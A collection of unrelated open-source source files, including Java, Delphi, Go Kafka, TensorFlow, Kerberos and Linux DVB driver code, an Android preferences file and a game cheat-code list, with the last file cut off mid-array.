import com.asakusafw.runtime.io.ModelOutput;
/**
* Output to text files.
* @param <T> the data type
* @since 0.9.1
*/
public interface TextOutput<T> extends ModelOutput<T> {
// no special members
}
| {
"pile_set_name": "Github"
} |
{(*}
(*------------------------------------------------------------------------------
Delphi Code formatter source code
The Original Code is frClarifyCaseBlocks.pas, released June 2004.
The Initial Developer of the Original Code is Anthony Steele.
Portions created by Anthony Steele are Copyright (C) 1999-2008 Anthony Steele.
All Rights Reserved.
Contributor(s): Anthony Steele.
The contents of this file are subject to the Mozilla Public License Version 1.1
(the "License"). you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://www.mozilla.org/NPL/
Software distributed under the License is distributed on an "AS IS" basis,
WITHOUT WARRANTY OF ANY KIND, either express or implied.
See the License for the specific language governing rights and limitations
under the License.
Alternatively, the contents of this file may be used under the terms of
the GNU General Public License Version 2 or later (the "GPL")
See http://www.gnu.org/licenses/gpl.html
------------------------------------------------------------------------------*)
{*)}
unit frClarifyCaseBlocks;
{$I JcfGlobal.inc}
interface
uses
Classes, StdCtrls, ExtCtrls,
IDEOptionsIntf, IDEOptEditorIntf;
type
{ TfClarifyCaseBlocks }
TfClarifyCaseBlocks = class(TAbstractIDEOptionsEditor)
rgLabelBegin: TRadioGroup;
rgLabel: TRadioGroup;
Label1: TLabel;
rgCaseLabel: TRadioGroup;
rgElseCase: TRadioGroup;
rgCaseBegin: TRadioGroup;
rgCaseElseBegin: TRadioGroup;
procedure FrameResize(Sender:TObject);
public
constructor Create(AOwner: TComponent); override;
function GetTitle: String; override;
procedure Setup({%H-}ADialog: TAbstractOptionsEditorDialog); override;
procedure ReadSettings({%H-}AOptions: TAbstractIDEOptions); override;
procedure WriteSettings({%H-}AOptions: TAbstractIDEOptions); override;
class function SupportedOptionsClass: TAbstractIDEOptionsClass; override;
end;
implementation
{$R *.lfm}
uses
JcfSettings, SettingsTypes, JcfUIConsts;
procedure TfClarifyCaseBlocks.FrameResize(Sender:TObject);
begin
rgLabel.Width := (Width-18) div 2;
end;
constructor TfClarifyCaseBlocks.Create(AOwner: TComponent);
begin
inherited;
//fiHelpContext := HELP_CLARIFY_BLOCKS;
end;
function TfClarifyCaseBlocks.GetTitle: String;
begin
Result := lisCaseBlocksCaseBlocks;
end;
procedure TfClarifyCaseBlocks.Setup(ADialog: TAbstractOptionsEditorDialog);
begin
Label1.Caption := lisCaseBlocksUseANewLineInCaseBlocksAt;
rgLabelBegin.Caption := lisCaseBlocksLabelWithBegin;
rgLabelBegin.Items[0] := lisCaseBlocksAlways;
rgLabelBegin.Items[1] := lisCaseBlocksLeaveAsIs;
rgLabelBegin.Items[2] := lisCaseBlocksNever;
rgLabel.Caption := lisCaseBlocksLabelWithoutBegin;
rgLabel.Items[0] := lisCaseBlocksAlways;
rgLabel.Items[1] := lisCaseBlocksLeaveAsIs;
rgLabel.Items[2] := lisCaseBlocksNever;
rgCaseBegin.Caption := lisCaseBlocksCaseWithBegin;
rgCaseBegin.Items[0] := lisCaseBlocksAlways;
rgCaseBegin.Items[1] := lisCaseBlocksLeaveAsIs;
rgCaseBegin.Items[2] := lisCaseBlocksNever;
rgCaseLabel.Caption := lisCaseBlocksCaseWithoutBegin;
rgCaseLabel.Items[0] := lisCaseBlocksAlways;
rgCaseLabel.Items[1] := lisCaseBlocksLeaveAsIs;
rgCaseLabel.Items[2] := lisCaseBlocksNever;
rgCaseElseBegin.Caption := lisCaseBlocksElseCaseWithBegin;
rgCaseElseBegin.Items[0] := lisCaseBlocksAlways;
rgCaseElseBegin.Items[1] := lisCaseBlocksLeaveAsIs;
rgCaseElseBegin.Items[2] := lisCaseBlocksNever;
rgElseCase.Caption := lisCaseBlocksElseCaseWithoutBegin;
rgElseCase.Items[0] := lisCaseBlocksAlways;
rgElseCase.Items[1] := lisCaseBlocksLeaveAsIs;
rgElseCase.Items[2] := lisCaseBlocksNever;
end;
{-------------------------------------------------------------------------------
worker procs }
procedure TfClarifyCaseBlocks.ReadSettings(AOptions: TAbstractIDEOptions);
begin
with FormattingSettings.Returns do
begin
{ block styles }
rgLabelBegin.ItemIndex := Ord(LabelBeginStyle);
rgLabel.ItemIndex := Ord(LabelStyle);
rgCaseLabel.ItemIndex := Ord(CaseLabelStyle);
rgCaseBegin.ItemIndex := Ord(CaseBeginStyle);
rgElseCase.ItemIndex := Ord(CaseElseStyle);
rgCaseElseBegin.ItemIndex := Ord(CaseElseBeginStyle);
end;
end;
procedure TfClarifyCaseBlocks.WriteSettings(AOptions: TAbstractIDEOptions);
begin
with FormattingSettings.Returns do
begin
{ block styles }
LabelBeginStyle := TTriOptionStyle(rgLabelBegin.ItemIndex);
LabelStyle := TTriOptionStyle(rgLabel.ItemIndex);
CaseLabelStyle := TTriOptionStyle(rgCaseLabel.ItemIndex);
CaseBeginStyle := TTriOptionStyle(rgCaseBegin.ItemIndex);
CaseElseStyle := TTriOptionStyle(rgElseCase.ItemIndex);
CaseElseBeginStyle := TTriOptionStyle(rgCaseElseBegin.ItemIndex);
end;
end;
class function TfClarifyCaseBlocks.SupportedOptionsClass: TAbstractIDEOptionsClass;
begin
Result := TFormattingSettings;
end;
{-------------------------------------------------------------------------------
event handlers }
initialization
RegisterIDEOptionsEditor(JCFOptionsGroup, TfClarifyCaseBlocks, JCFOptionCaseBlocks, JCFOptionLongLines);
end.
| {
"pile_set_name": "Github"
} |
package sarama
type OffsetResponseBlock struct {
Err KError
Offsets []int64 // Version 0
Offset int64 // Version 1
Timestamp int64 // Version 1
}
func (b *OffsetResponseBlock) decode(pd packetDecoder, version int16) (err error) {
tmp, err := pd.getInt16()
if err != nil {
return err
}
b.Err = KError(tmp)
if version == 0 {
b.Offsets, err = pd.getInt64Array()
return err
}
b.Timestamp, err = pd.getInt64()
if err != nil {
return err
}
b.Offset, err = pd.getInt64()
if err != nil {
return err
}
// For backwards compatibility put the offset in the offsets array too
b.Offsets = []int64{b.Offset}
return nil
}
func (b *OffsetResponseBlock) encode(pe packetEncoder, version int16) (err error) {
pe.putInt16(int16(b.Err))
if version == 0 {
return pe.putInt64Array(b.Offsets)
}
pe.putInt64(b.Timestamp)
pe.putInt64(b.Offset)
return nil
}
type OffsetResponse struct {
Version int16
Blocks map[string]map[int32]*OffsetResponseBlock
}
func (r *OffsetResponse) decode(pd packetDecoder, version int16) (err error) {
numTopics, err := pd.getArrayLength()
if err != nil {
return err
}
r.Blocks = make(map[string]map[int32]*OffsetResponseBlock, numTopics)
for i := 0; i < numTopics; i++ {
name, err := pd.getString()
if err != nil {
return err
}
numBlocks, err := pd.getArrayLength()
if err != nil {
return err
}
r.Blocks[name] = make(map[int32]*OffsetResponseBlock, numBlocks)
for j := 0; j < numBlocks; j++ {
id, err := pd.getInt32()
if err != nil {
return err
}
block := new(OffsetResponseBlock)
err = block.decode(pd, version)
if err != nil {
return err
}
r.Blocks[name][id] = block
}
}
return nil
}
func (r *OffsetResponse) GetBlock(topic string, partition int32) *OffsetResponseBlock {
if r.Blocks == nil {
return nil
}
if r.Blocks[topic] == nil {
return nil
}
return r.Blocks[topic][partition]
}
/*
// [0 0 0 1 ntopics
0 8 109 121 95 116 111 112 105 99 topic
0 0 0 1 npartitions
0 0 0 0 id
0 0
0 0 0 1 0 0 0 0
0 1 1 1 0 0 0 1
0 8 109 121 95 116 111 112
105 99 0 0 0 1 0 0
0 0 0 0 0 0 0 1
0 0 0 0 0 1 1 1] <nil>
*/
func (r *OffsetResponse) encode(pe packetEncoder) (err error) {
if err = pe.putArrayLength(len(r.Blocks)); err != nil {
return err
}
for topic, partitions := range r.Blocks {
if err = pe.putString(topic); err != nil {
return err
}
if err = pe.putArrayLength(len(partitions)); err != nil {
return err
}
for partition, block := range partitions {
pe.putInt32(partition)
if err = block.encode(pe, r.version()); err != nil {
return err
}
}
}
return nil
}
func (r *OffsetResponse) key() int16 {
return 2
}
func (r *OffsetResponse) version() int16 {
return r.Version
}
func (r *OffsetResponse) headerVersion() int16 {
return 0
}
func (r *OffsetResponse) requiredVersion() KafkaVersion {
switch r.Version {
case 1:
return V0_10_1_0
default:
return MinVersion
}
}
// testing API
func (r *OffsetResponse) AddTopicPartition(topic string, partition int32, offset int64) {
if r.Blocks == nil {
r.Blocks = make(map[string]map[int32]*OffsetResponseBlock)
}
byTopic, ok := r.Blocks[topic]
if !ok {
byTopic = make(map[int32]*OffsetResponseBlock)
r.Blocks[topic] = byTopic
}
byTopic[partition] = &OffsetResponseBlock{Offsets: []int64{offset}, Offset: offset}
}
| {
"pile_set_name": "Github"
} |
import tensorflow as tf
import numpy as np
import utils as ut
import network as nt
import setting as st
from sklearn.metrics import accuracy_score, cohen_kappa_score
## Placeholders
X = tf.placeholder(dtype=tf.float32, shape=[st.batch_size, 22, 512, 1])
Y = tf.placeholder(dtype=tf.float32, shape=[st.batch_size])
X_valid = tf.placeholder(dtype=tf.float32, shape=[239, 22, 512, 1])
Y_valid = tf.placeholder(dtype=tf.float32, shape=[239])
## Load dataset
sbj = st.subject
data, label, data_valid, label_valid = ut.load_data(sbj=sbj, training=True) #(22, 750, 288), (288,)
data_test, label_test = ut.load_data(sbj=sbj, training=False) #(22, 750, 288), (288,)
## Baseline
logits, _, _, _ = nt.DeepConvNet(input=X, adversarial=False)
loss = ut.calculate_loss_baseline(logits=logits, labels=Y)
vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="DeepConvNet")
_, output, feature_tsne, sptial_weight = nt.DeepConvNet(input=X_valid, adversarial=False, reuse=True)
learning_rate = st.learning_rate
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss, var_list=vars)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(keep_checkpoint_every_n_hours=24, max_to_keep=1000)
rest_point = data.shape[1] - st.window_size + 1
total_batch = int((data.shape[-1] * rest_point)/st.batch_size)
loss_ = 0
print("Baseline Results")
print("Subject %d" % sbj)
for epoch in range(st.total_epoch):
# Randomize the dataset
rand_idx = np.random.permutation(rest_point * data.shape[-1]) # 68832
# Feed dictionary
for batch in range(total_batch):
batch_x = np.empty(shape=(st.batch_size, 22, st.window_size, 1))
batch_y = np.empty(shape=(st.batch_size))
for i in range(st.batch_size):
position = np.unravel_index(indices=rand_idx[epoch * st.batch_size + i], dims=(rest_point, data.shape[-1]))
batch_x[i, :, :, 0] = data[:, position[0]:position[0] + st.window_size, position[1]]
batch_y[i] = label[position[1]]
_, loss_ = sess.run([optimizer, loss], feed_dict={X:batch_x, Y:batch_y})
print("%04dth Epoch, Training Loss: %04f" % (epoch + 1, loss_))
# Validation
prediction = np.zeros(shape=(288))
grount_truth = np.zeros(shape=(288))
for trials in range(0, 288):
batch_x = np.empty(shape=(rest_point, 22, st.window_size, 1))
for batch in range(rest_point):
batch_x[batch, :, :, 0] = data_test[:, batch:batch+st.window_size, trials]
pred, feature = sess.run([output, feature_tsne], feed_dict={X_valid:batch_x})
grount_truth[trials] = label_test[trials]
prediction[trials] = np.argmax(np.bincount(np.squeeze(np.asarray(pred))))
np.save(st.tsne_path + "/common%04d_gt%d.npy" % (epoch, grount_truth[trials]), feature)
print("Validation accuracy: %f Kappa value: %f"
% (accuracy_score(y_true=grount_truth, y_pred=prediction), cohen_kappa_score(y1=grount_truth, y2=prediction)))
saver.save(sess, st.path + "/model%sbj%epoch.ckpt" %(sbj, epoch)) | {
"pile_set_name": "Github"
} |
// bslma_usesbslmaallocator.cpp -*-C++-*-
#include <bslma_usesbslmaallocator.h>
#include <bsls_ident.h>
BSLS_IDENT("$Id$ $CSID$")
#include <bslmf_assert.h> // for testing only
#include <bslmf_nestedtraitdeclaration.h> // for testing only
namespace BloombergLP {
} // close enterprise namespace
// ----------------------------------------------------------------------------
// Copyright 2013 Bloomberg Finance L.P.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// ----------------------------- END-OF-FILE ----------------------------------
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*******************************************************************************/
package org.apache.ofbiz.minilang.method.entityops;
import org.apache.ofbiz.base.util.Debug;
import org.apache.ofbiz.base.util.collections.FlexibleMapAccessor;
import org.apache.ofbiz.entity.GenericEntityException;
import org.apache.ofbiz.entity.GenericValue;
import org.apache.ofbiz.minilang.MiniLangException;
import org.apache.ofbiz.minilang.MiniLangValidate;
import org.apache.ofbiz.minilang.SimpleMethod;
import org.apache.ofbiz.minilang.method.MethodContext;
import org.apache.ofbiz.minilang.method.MethodOperation;
import org.w3c.dom.Element;
/**
* Implements the <create-value> element.
* @see <a href="https://cwiki.apache.org/confluence/display/OFBIZ/Mini+Language+-+minilang+-+simple-method+-+Reference">Mini-language Reference</a>
*/
public final class CreateValue extends MethodOperation {
private static final String MODULE = CreateValue.class.getName();
private final boolean createOrStore;
@Deprecated
private final boolean doCacheClear;
private final FlexibleMapAccessor<GenericValue> valueFma;
public CreateValue(Element element, SimpleMethod simpleMethod) throws MiniLangException {
super(element, simpleMethod);
if (MiniLangValidate.validationOn()) {
MiniLangValidate.attributeNames(simpleMethod, element, "value-field", "do-cache-clear", "or-store");
MiniLangValidate.requiredAttributes(simpleMethod, element, "value-field");
MiniLangValidate.expressionAttributes(simpleMethod, element, "value-field");
MiniLangValidate.constantAttributes(simpleMethod, element, "do-cache-clear", "or-store");
MiniLangValidate.noChildElements(simpleMethod, element);
}
valueFma = FlexibleMapAccessor.getInstance(element.getAttribute("value-field"));
doCacheClear = !"false".equals(element.getAttribute("do-cache-clear"));
createOrStore = "true".equals(element.getAttribute("or-store"));
}
@Override
public boolean exec(MethodContext methodContext) throws MiniLangException {
SimpleMethod simpleMethod = getSimpleMethod();
GenericValue value = valueFma.get(methodContext.getEnvMap());
if (value == null) {
String errMsg = "In <create-value> the value \"" + valueFma + "\" was not found, not creating";
Debug.logWarning(errMsg, MODULE);
getSimpleMethod().addErrorMessage(methodContext, errMsg);
return false;
}
try {
if (createOrStore) {
value.getDelegator().createOrStore(value);
} else {
value.getDelegator().create(value);
}
} catch (GenericEntityException e) {
String errMsg = "Exception thrown while creating the \"" + valueFma + "\" GenericValue: " + e.getMessage();
Debug.logWarning(e, errMsg, MODULE);
getSimpleMethod().addErrorMessage(methodContext, errMsg);
return false;
}
return true;
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder("<create-value ");
sb.append("value-field=\"").append(this.valueFma).append("\" ");
if (!this.doCacheClear) {
sb.append("do-cache-clear=\"false\"");
}
if (this.createOrStore) {
sb.append("or-store=\"true\"");
}
sb.append("/>");
return sb.toString();
}
/**
* A factory for the <create-value> element.
*/
public static final class CreateValueFactory implements Factory<CreateValue> {
@Override
public CreateValue createMethodOperation(Element element, SimpleMethod simpleMethod) throws MiniLangException {
return new CreateValue(element, simpleMethod);
}
@Override
public String getName() {
return "create-value";
}
}
}
| {
"pile_set_name": "Github"
} |
#ifndef IDC_STATIC
#define IDC_STATIC (-1)
#endif
#define IDD_DIALOG1 101
#define IDD_DIALOG2 102
#define IDC_LIST1 1000
#define IDC_ACTIVE 1004
#define IDI_ICON1 1005
#define IDC_INFO 40001
#define IDC_USERTEXT 40002
#define IDC_VERS 40003
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2007 Davis E. King ([email protected])
// License: Boost Software License See LICENSE.txt for the full license.
#ifndef DLIB_TIMEOUt_
#define DLIB_TIMEOUt_
#include "timeout/timeout.h"
#endif // DLIB_TIMEOUt_
| {
"pile_set_name": "Github"
} |
import Link from 'next/link'
import styles from './header.module.css'
import LogoIcon from '@/components/icons/logo'
import useTheme from '@/lib/theme'
import Moon from '@/components/icons/moon'
import Sun from '@/components/icons/sun'
import useMounted from '@/lib/use-mounted'
const Header = ({ slug, title }) => {
const isMounted = useMounted()
const { theme, toggleTheme } = useTheme()
return (
<nav className={styles.nav}>
<div className={styles.header}>
<span>
<Link href="/">
<a
aria-label="Navigate Home"
className={slug ? styles.home : styles.slug}
>
whatthefuck.is
</a>
</Link>
<span className={styles.tagline}>
· {' '}
{slug ? (
<b>
<span style={{ color: 'var(--accent)' }}>{title}</span>
</b>
) : (
<>Dan’s JavaScript Glossary</>
)}
</span>
</span>
<button
className={styles.command}
onClick={toggleTheme}
aria-label="Toggle Theme"
>
{isMounted &&
(theme === 'light' ? (
<Moon color="var(--fg)" size={30} key="icon-light" />
) : (
<Sun color="var(--fg)" size={30} key="icon-dark" />
))}
</button>
</div>
</nav>
)
}
export default Header
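// Illustrative usage (prop values are placeholders): on an entry page the header
// shows the term title next to the site name, e.g. <Header slug="closure" title="a closure" />;
// on the index page both props are omitted and the default tagline is rendered instead.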
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<PreferenceScreen xmlns:android="http://schemas.android.com/apk/res/android">
<Preference
android:defaultValue=""
android:key="PERF_FORUMS2"
android:title="@string/pref_title_forum"/>
<MultiSelectListPreference
android:defaultValue="@array/default_freq_menu_values"
android:entries="@array/pref_title_freq_menu_names"
android:entryValues="@array/pref_title_freq_menu_values"
android:key="PERF_FREQ_MENUS"
android:title="@string/pref_title_freq_menus"/>
<PreferenceCategory android:title="@string/pref_category_tail">
<SwitchPreference
android:defaultValue="false"
android:key="PERF_SHOW_TAIL"
android:title="@string/pref_title_show_tail"/>
<SwitchPreference
android:defaultValue="false"
android:key="PERF_ADDTAIL"
android:title="@string/pref_title_add_tail"/>
<EditTextPreference
android:defaultValue="@string/default_tail_text"
android:inputType="text"
android:key="PERF_TAILTEXT"
android:maxLines="1"
android:selectAllOnFocus="true"
android:singleLine="true"
android:title="@string/pref_title_tail_text"/>
<EditTextPreference
android:defaultValue="@string/default_tail_url"
android:inputType="text"
android:key="PERF_TAILURL"
android:maxLines="1"
android:selectAllOnFocus="true"
android:singleLine="true"
android:title="@string/pref_title_tail_url"/>
</PreferenceCategory>
<PreferenceCategory android:title="@string/pref_category_blacklist">
<Preference
android:key="PERF_BLACKLIST"
android:title="@string/pref_title_blacklist"
android:summary="@string/pref_summary_blacklist"
android:widgetLayout="@layout/layout_preference"/>
</PreferenceCategory>
</PreferenceScreen> | {
"pile_set_name": "Github"
} |
/**
* This file is part of LIO-mapping.
*
* Copyright (C) 2019 Haoyang Ye <hy.ye at connect dot ust dot hk>,
* Robotics and Multiperception Lab (RAM-LAB <https://ram-lab.com>),
* The Hong Kong University of Science and Technology
*
* For more information please see <https://ram-lab.com/file/hyye/lio-mapping>
* or <https://sites.google.com/view/lio-mapping>.
* If you use this code, please cite the respective publications as
* listed on the above websites.
*
* LIO-mapping is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LIO-mapping is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LIO-mapping. If not, see <http://www.gnu.org/licenses/>.
*/
//
// Created by hyye on 4/11/18.
//
#include "factor/GravityLocalParameterization.h"
namespace lio {
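// The gravity direction has only two rotational degrees of freedom, so the local
// update below is a 2-vector treated as a small rotation about the x and y axes
// (z held at zero) and composed with the current quaternion estimate.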
bool GravityLocalParameterization::Plus(const double *x, const double *delta, double *x_plus_delta) const
{
Eigen::Map<const Eigen::Quaterniond> q(x);
Eigen::Map<const Eigen::Vector2d> dq_xy(delta);
Eigen::Quaterniond dq = DeltaQ(Eigen::Vector3d(dq_xy.x(), dq_xy.y(), 0.0));
Eigen::Map<Eigen::Quaterniond> q_plus(x_plus_delta);
q_plus = (q * dq).normalized();
return true;
}
bool GravityLocalParameterization::ComputeJacobian(const double *x, double *jacobian) const
{
Eigen::Map<Eigen::Matrix<double, 4, 2, Eigen::RowMajor>> j(jacobian);
j.topRows<2>().setIdentity();
j.bottomRows<2>().setZero();
return true;
}
} | {
"pile_set_name": "Github"
} |
// Copyright 2008, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// Author: [email protected] (Markus Heule)
//
// This test verifies that it's possible to use Google Test by including
// the gtest.h header file alone.
#include "gtest/gtest.h"
namespace {
void Subroutine() {
EXPECT_EQ(42, 42);
}
TEST(NoFatalFailureTest, ExpectNoFatalFailure) {
EXPECT_NO_FATAL_FAILURE(;);
EXPECT_NO_FATAL_FAILURE(SUCCEED());
EXPECT_NO_FATAL_FAILURE(Subroutine());
EXPECT_NO_FATAL_FAILURE({ SUCCEED(); });
}
TEST(NoFatalFailureTest, AssertNoFatalFailure) {
ASSERT_NO_FATAL_FAILURE(;);
ASSERT_NO_FATAL_FAILURE(SUCCEED());
ASSERT_NO_FATAL_FAILURE(Subroutine());
ASSERT_NO_FATAL_FAILURE({ SUCCEED(); });
}
} // namespace
| {
"pile_set_name": "Github"
} |
cheats = 13
cheat0_desc = "RCJC Pad 1"
cheat0_code = "700946E2+????"
cheat0_enable = false
cheat1_desc = "RCJC Pad 2"
cheat1_code = "7009470A+????"
cheat1_enable = false
cheat2_desc = "AnAc Pad 1"
cheat2_code = "700946E0+????"
cheat2_enable = false
cheat3_desc = "AnAc Pad 2"
cheat3_code = "70094708+????"
cheat3_enable = false
cheat4_desc = "Auto Activation Code"
cheat4_code = "F006CCDC+8009"
cheat4_enable = false
cheat5_desc = "PAL2NTSC"
cheat5_code = "34229D0F+091B"
cheat5_enable = false
cheat6_desc = "Y-Fix"
cheat6_code = "84230008+6C24"
cheat6_enable = false
cheat7_desc = "Red blood with german menus"
cheat7_code = "8420382E+E8B2"
cheat7_enable = false
cheat8_desc = "Developer cheat menu open"
cheat8_code = "742CC6EC+B67E+342CC6EC+B67D"
cheat8_enable = false
cheat9_desc = "Finish level (Press L2 & R2 & Circle)"
cheat9_code = "742CBD39+078A+842EB969+5125"
cheat9_enable = false
cheat10_desc = "Max. score (Press L1 & L2 & R1 & R2 at result screen)"
cheat10_code = "742CBD39+2B8A+B427FAD2+1238+142CC424+4BA6"
cheat10_enable = false
cheat11_desc = "Sudden death"
cheat11_code = "84240F89+C094"
cheat11_enable = false
cheat12_desc = "Hit anywhere"
cheat12_code = "04243E58+568A"
cheat12_enable = false
| {
"pile_set_name": "Github"
} |
/* -*- mode: c; c-basic-offset: 4; indent-tabs-mode: nil -*- */
/*
* Copyright (C) 1998 by the FundsXpress, INC.
*
* All rights reserved.
*
* Export of this software from the United States of America may require
* a specific license from the United States Government. It is the
* responsibility of any person or organization contemplating export to
* obtain such a license before exporting.
*
* WITHIN THAT CONSTRAINT, permission to use, copy, modify, and
* distribute this software and its documentation for any purpose and
* without fee is hereby granted, provided that the above copyright
* notice appear in all copies and that both that copyright notice and
* this permission notice appear in supporting documentation, and that
* the name of FundsXpress. not be used in advertising or publicity pertaining
* to distribution of the software without specific, written prior
* permission. FundsXpress makes no representations about the suitability of
* this software for any purpose. It is provided "as is" without express
* or implied warranty.
*
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/
#include "k5-int.h"
#include "cksumtypes.h"
krb5_error_code KRB5_CALLCONV
krb5_string_to_cksumtype(char *string, krb5_cksumtype *cksumtypep)
{
unsigned int i, j;
const char *alias;
const struct krb5_cksumtypes *ctp;
for (i=0; i<krb5int_cksumtypes_length; i++) {
ctp = &krb5int_cksumtypes_list[i];
if (strcasecmp(ctp->name, string) == 0) {
*cksumtypep = ctp->ctype;
return 0;
}
#define MAX_ALIASES (sizeof(ctp->aliases) / sizeof(ctp->aliases[0]))
for (j = 0; j < MAX_ALIASES; j++) {
alias = ctp->aliases[j];
if (alias == NULL)
break;
if (strcasecmp(alias, string) == 0) {
*cksumtypep = ctp->ctype;
return 0;
}
}
}
return EINVAL;
}
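/* Illustrative lookup (the checksum type name is an example; it must match a name
 * or alias in krb5int_cksumtypes_list):
 *
 *     krb5_cksumtype ctype;
 *     if (krb5_string_to_cksumtype("hmac-sha1-96-aes128", &ctype) == 0)
 *         ... use ctype ...
 */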
| {
"pile_set_name": "Github"
} |
/*
* TTUSB DEC Frontend Driver
*
* Copyright (C) 2003-2004 Alex Woods <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
*/
#include "dvb_frontend.h"
#include "ttusbdecfe.h"
#define LOF_HI 10600000
#define LOF_LO 9750000
struct ttusbdecfe_state {
/* configuration settings */
const struct ttusbdecfe_config* config;
struct dvb_frontend frontend;
u8 hi_band;
u8 voltage;
};
static int ttusbdecfe_dvbs_read_status(struct dvb_frontend *fe,
fe_status_t *status)
{
*status = FE_HAS_SIGNAL | FE_HAS_VITERBI |
FE_HAS_SYNC | FE_HAS_CARRIER | FE_HAS_LOCK;
return 0;
}
static int ttusbdecfe_dvbt_read_status(struct dvb_frontend *fe,
fe_status_t *status)
{
struct ttusbdecfe_state* state = fe->demodulator_priv;
u8 b[] = { 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };
u8 result[4];
int len, ret;
*status=0;
ret=state->config->send_command(fe, 0x73, sizeof(b), b, &len, result);
if(ret)
return ret;
if(len != 4) {
printk(KERN_ERR "%s: unexpected reply\n", __func__);
return -EIO;
}
switch(result[3]) {
case 1: /* not tuned yet */
case 2: /* no signal/no lock*/
break;
case 3: /* signal found and locked*/
*status = FE_HAS_SIGNAL | FE_HAS_VITERBI |
FE_HAS_SYNC | FE_HAS_CARRIER | FE_HAS_LOCK;
break;
case 4:
*status = FE_TIMEDOUT;
break;
default:
pr_info("%s: returned unknown value: %d\n",
__func__, result[3]);
return -EIO;
}
return 0;
}
static int ttusbdecfe_dvbt_set_frontend(struct dvb_frontend *fe)
{
struct dtv_frontend_properties *p = &fe->dtv_property_cache;
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
u8 b[] = { 0x00, 0x00, 0x00, 0x03,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0xff,
0x00, 0x00, 0x00, 0xff };
__be32 freq = htonl(p->frequency / 1000);
memcpy(&b[4], &freq, sizeof (u32));
state->config->send_command(fe, 0x71, sizeof(b), b, NULL, NULL);
return 0;
}
static int ttusbdecfe_dvbt_get_tune_settings(struct dvb_frontend* fe,
struct dvb_frontend_tune_settings* fesettings)
{
fesettings->min_delay_ms = 1500;
/* Drift compensation makes no sense for DVB-T */
fesettings->step_size = 0;
fesettings->max_drift = 0;
return 0;
}
static int ttusbdecfe_dvbs_set_frontend(struct dvb_frontend *fe)
{
struct dtv_frontend_properties *p = &fe->dtv_property_cache;
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
u8 b[] = { 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
